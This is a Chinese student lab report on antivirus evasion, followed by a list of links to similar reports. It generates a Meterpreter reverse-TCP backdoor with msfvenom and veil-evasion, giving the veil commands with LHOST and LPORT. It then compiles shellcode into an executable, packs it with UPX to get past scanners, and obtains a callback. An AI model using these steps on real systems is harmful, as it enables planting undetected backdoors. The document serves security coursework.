关键词:
20155331 Exp3 免杀原理与实践
基础问题回答
杀软是如何检测出恶意代码的?
1.基于特征码的检测,2.启发式恶意软件检测,3.基于行为的恶意软件检测。
免杀是做什么?
让病毒不被杀毒软件杀掉。
免杀的基本方法有哪些?
1.改变特征码 2.加壳
实践总结与体会
这次实验让我深入理解了免杀原理,也让我知道了原来以前认为很安全的杀毒软件业并没有那么可靠,因为有很多方法可以实现免杀,给我们的电脑带来风险。
离实战还缺些什么技术或步骤?
实战中不可能那么容易在别人的电脑中植入一个后门程序。
实验的局限性很大。
实践过程记录
一.免杀效果参考基准
把上一次实验用msfvenom生成的后门放入http://www.virscan.org/进行检测
二.使用MSF编码器
对后门程序进行一次重新编码,再次进行检测
我们再将后门程序进行编码十次,然后再检测
可见,编码对免杀没啥用。
三.使用veil-evasion生成
启动evail-evasion,设置好回连的IP地址和端口号后,生成后门文件。
命令行中输入veil,
后在veil中输入命令use evasion
依次输入如下命令:
use c/meterpreter/rev_tcp.py
set LHOST 192.168.81.128
set LPORT 5331
generate
可执行文件的文件名(palyload5331)
通过命令找到文件
扫描结果
四.利用shellcode编写后门
首先,在Kali上使用命令生成一个c语言格式的Shellcode数组
创建一个文件5331dzdd.c,然后将unsigned char buf[]赋值到其中,
使用命令:i686-w64-mingw32-g++ 20155312.c -o 20155312.exe编译这个.c文件为可执行文件:
在扫描软件上看看
使用UPX对生成的后门程序加壳:
再扫描
杀毒软件没杀出来这个后门,实验成功,实现了免杀
回连
在kali下进入MSF打开监听进程,实现方法参考上期实验博客
尝试运行,后门程序成功获取权限
实验中遇到的问题
解决方案:把虚拟机里的.lck的文件夹给删了,然后再把任务管理器里面的所有VM关了再重启,不过每次重新开机时还是会有这个问题。
20155302《网络对抗》exp3免杀原理与实践
20155302《网络对抗》Exp3免杀原理与实践实验要求1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)2.通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了... 查看详情
exp3免杀原理与实践20154302薛师凡
Exp3免杀原理与实践20154302薛师凡一、实践目标与内容利用多种工具实现实现恶意代码免杀在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功。在保证后门程序功能的情况下实现杀软共存。二、实践过程与步骤1.... 查看详情
exp3免杀原理与实践20164321王君陶
Exp3免杀原理与实践20164321王君陶1实验要求1.1正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)1.2通过组合应用各种技术实现恶意代码免杀(0.5... 查看详情
exp3免杀原理与实践20155113徐步桥
Exp3免杀原理实践1.实验目标1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)1.2通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了免杀的,简单语言... 查看详情
20155338《网络对抗》exp3免杀原理与实践
20155338《网络对抗》Exp3免杀原理与实践实验过程一、免杀效果参考基准Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒。二、使用msf编码器编码一次,在K... 查看详情
exp3免杀原理与实践
...为检测 -启发式检测类似(2)免杀是做什么?使恶意软件不被AV检测出来(3)免杀的基本方法有哪些? 改变特 查看详情
20155320exp3免杀原理与实践(代码片段)
20155320Exp3免杀原理与实践免杀一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。【基础问题回答】(1)杀软是如何检测出恶意代码的?1.通过行为检测2.通过特征码的比对3.启发式检测(2... 查看详情
2017-2018-420155317《网络对抗技术》exp3免杀原理与实践
2017-2018-420155317《网络对抗技术》EXP3免杀原理与实践一、问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?2.实践(1)正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,... 查看详情
20165306exp3免杀原理与实践(代码片段)
Exp3免杀原理与实践一、实践内容概述1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程2.通过组合应用各种技术实现恶意代码免杀3.用另一电脑实测,在杀软开启的情况下,可运行并回... 查看详情
20165218《网络对抗技术》exp3免杀原理与实践(代码片段)
Exp3免杀原理与实践任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用VirusTotal或Viscan网站扫描后门程序VirusTotalViscan免杀工具1——msfvenom使用编码器-使用msfvenom命... 查看详情
exp3免杀原理与实践20154301仉鑫烨(代码片段)
20154301Exp3免杀原理与实践仉鑫烨一、实践内容正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;通过组合应用各种技术实现恶意代码免杀;用另一电脑实测,在杀软开启的情... 查看详情
2017-2018-2《网络对抗技术》20155322exp3免杀原理与实践(代码片段)
#2017-2018-2《网络对抗技术》20155322Exp3免杀原理与实践[-=博客目录=-]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-正确使用msf编码器2.2-veil-evasion2.3-组合应用技术实现免杀2.4-靶机实测2.5-基础问题回答3-资料1-实践目... 查看详情
20165207exp3免杀原理与实践
Exp3免杀原理与实践1、实验内容1.1、使用msf1.1.1、确定基准线首先看kali的ip直接msfvenom的结果,不加其他的东西:使用VirusTotal得到的检测这个程序得到的结果:所以最终结果是69款软件中有49款检测出来了,49/69是基准线。1.1.2、使... 查看详情
20154307《网络对抗》exp3免杀原理与实践(代码片段)
20154307《网络对抗》Exp3免杀原理与实践一、基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。启发式恶意软件... 查看详情
20155330《网络攻防》exp3免杀原理与实践(代码片段)
20155330《网络攻防》Exp3免杀原理与实践基础问题回答杀软是如何检测出恶意代码的?基于特征码。先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码。基于行为。杀软通过检... 查看详情
exp3免杀原理与实践(代码片段)
Exp3免杀原理与实践这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课。另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面。这次的目标免杀平台是64位windows7SP1,我用... 查看详情
20155236范晨歌_exp3免杀原理与实践(代码片段)
20155236范晨歌_免杀原理与实践免杀概述免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写VirusAV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。被谁杀?当然是被杀毒软件(引擎)... 查看详情
2018-2019-220165114《网络对抗技术》exp3免杀原理与实践(代码片段)
Exp3免杀原理与实践目录一、实验内容二、基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?三、实践过程记录正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用... 查看详情